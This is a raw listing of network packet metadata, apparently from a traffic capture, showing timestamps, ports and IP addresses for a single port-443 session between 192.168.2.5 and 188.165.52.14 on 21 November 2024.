Nov 21, 2024 22:12:26.338236094 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:26.342833042 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:26.342852116 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:26.342907906 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:26.342916965 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:26.344235897 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:26.464940071 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:26.464960098 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:26.465107918 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:26.465137959 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:26.465307951 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:26.470571041 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:26.470586061 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:26.470701933 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:26.470711946 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:26.470963955 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:26.507673979 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:26.507688046 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:26.507875919 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:26.507890940 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:26.508090019 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:26.512917042 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:26.512932062 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:26.513004065 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:26.513019085 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:26.513087988 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:26.518668890 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:26.518683910 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:26.518754005 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:26.518785000 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:26.518842936 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:26.524153948 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:26.524187088 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:26.524226904 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:26.524235964 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:26.524262905 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:26.524287939 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:26.529131889 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:26.529145002 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:26.529206991 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:26.529216051 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:26.529285908 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:26.535136938 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:26.535152912 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:26.535218000 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:26.535228014 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:26.535299063 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:26.777822018 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:26.777847052 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:26.778086901 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:26.778114080 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:26.778297901 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:26.901150942 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:26.901222944 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:26.901235104 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:26.901271105 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:26.901279926 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:26.901314020 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:26.906088114 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:26.906133890 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:26.906162024 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:26.906172991 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:26.906189919 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:26.906217098 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:26.911700010 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:26.911744118 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:26.911773920 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:26.911784887 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:26.911798000 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:26.911828995 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:26.917062998 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:26.917108059 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:26.917155981 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:26.917164087 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:26.917181969 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:26.917205095 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:26.922709942 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:26.922727108 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:26.922785997 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:26.922801018 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:26.922851086 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:26.928209066 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:26.928225040 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:26.928284883 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:26.928294897 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:26.928354979 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:26.933185101 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:26.933199883 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:26.933269978 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:26.933280945 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:26.933320999 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:26.939162016 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:26.939176083 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:26.939239025 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:26.939265966 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:26.939336061 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:26.944159985 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:26.944174051 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:26.944225073 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:26.944235086 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:26.944266081 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:26.944283962 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:26.949883938 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:26.949927092 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:26.949959993 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:26.949969053 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:26.950012922 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:26.950031042 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:26.955543995 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:26.955588102 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:26.955624104 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:26.955634117 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:26.955662012 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:26.955679893 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:26.960805893 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:26.960846901 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:26.960879087 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:26.960887909 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:26.960911989 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:26.960925102 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:26.966500044 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:26.966545105 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:26.966574907 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:26.966583967 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:26.966608047 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:26.966624022 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:26.971343040 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:26.971358061 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:26.971438885 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:26.971447945 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:26.971488953 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:26.977087975 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:26.977102995 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:26.977169991 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:26.977179050 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:26.977216005 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:27.041104078 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:27.041126013 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:27.041410923 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:27.041439056 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:27.041488886 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:27.046761036 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:27.046781063 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:27.046843052 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:27.046852112 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:27.046931028 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:27.084820032 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:27.084830999 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:27.084970951 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:27.085000038 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:27.085048914 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:27.089483023 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:27.089507103 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:27.089564085 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:27.089572906 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:27.089612007 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:27.092835903 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:27.092853069 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:27.092902899 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:27.092911959 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:27.092942953 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:27.092966080 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:27.096257925 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:27.096290112 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:27.096345901 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:27.096354961 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:27.096395016 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:27.100239992 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:27.100255013 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:27.100317955 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:27.100327015 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:27.100364923 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:27.103492975 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:27.103507996 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:27.103565931 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:27.103574038 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:27.103615999 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:27.232757092 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:27.232783079 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:27.233055115 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:27.233084917 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:27.233138084 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:27.236453056 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:27.236469984 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:27.236536980 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:27.236557007 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:27.236598015 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:27.276796103 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:27.276812077 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:27.277031898 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:27.277060986 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:27.277111053 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:27.280972004 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:27.280986071 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:27.281047106 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:27.281055927 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:27.281084061 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:27.281101942 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:27.284869909 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:27.284884930 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:27.284955978 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:27.284964085 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:27.284995079 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:27.285011053 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:27.288126945 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:27.288141012 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:27.288208961 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:27.288218021 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:27.288264990 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:27.292047977 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:27.292066097 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:27.292119026 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:27.292131901 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:27.292152882 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:27.292176962 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:27.295279026 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:27.295293093 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:27.295360088 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:27.295368910 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:27.295416117 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:27.424732924 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:27.424752951 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:27.424851894 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:27.424870014 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:27.424910069 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:27.428600073 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:27.428617001 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:27.428690910 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:27.428699017 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:27.428736925 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:27.468955994 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:27.468978882 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:27.469057083 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:27.469074965 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:27.469222069 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:27.473180056 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:27.473220110 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:27.473283052 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:27.473290920 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:27.473330975 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:27.476378918 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:27.476392984 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:27.476546049 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:27.476552963 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:27.476592064 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:27.480338097 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:27.480351925 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:27.480410099 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:27.480417013 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:27.480459929 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:27.483644962 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:27.483659983 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:27.483717918 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:27.483731031 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:27.483767986 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:27.486780882 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:27.486793995 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:27.486855030 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:27.486862898 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:27.486898899 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:27.616858959 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:27.616878986 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:27.616993904 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:27.617029905 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:27.617191076 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:27.620918036 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:27.620934963 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:27.621011019 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:27.621021032 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:27.621063948 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:27.661089897 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:27.661107063 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:27.661364079 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:27.661407948 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:27.661456108 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:27.664870024 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:27.664896965 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:27.664982080 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:27.664994001 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:27.665036917 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:27.668891907 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:27.668909073 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:27.669002056 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:27.669014931 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:27.669058084 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:27.672091961 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:27.672107935 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:27.672168016 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:27.672178984 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:27.672202110 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:27.672223091 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:27.675973892 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:27.675985098 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:27.676052094 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:27.676064968 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:27.676110983 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:27.679117918 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:27.679132938 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:27.679188967 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:27.679198027 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:27.679233074 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:27.808780909 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:27.808799028 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:27.808851957 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:27.808872938 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:27.808891058 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:27.808917046 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:27.812647104 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:27.812666893 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:27.812714100 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:27.812727928 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:27.812815905 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:27.813180923 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:27.853072882 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:27.853092909 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:27.853193998 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:27.853235960 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:27.853283882 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:27.857584000 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:27.857600927 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:27.857681036 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:27.857702017 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:27.857744932 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:27.860836029 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:27.860852957 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:27.861951113 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:27.861964941 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:27.862014055 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:27.863934994 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:27.863954067 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:27.864022017 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:27.864032984 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:27.864078045 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:27.868232012 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:27.868247032 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:27.868314028 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:27.868325949 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:27.868370056 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:27.871485949 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:27.871506929 CET	443	49824	188.165.52.14	192.168.2.5
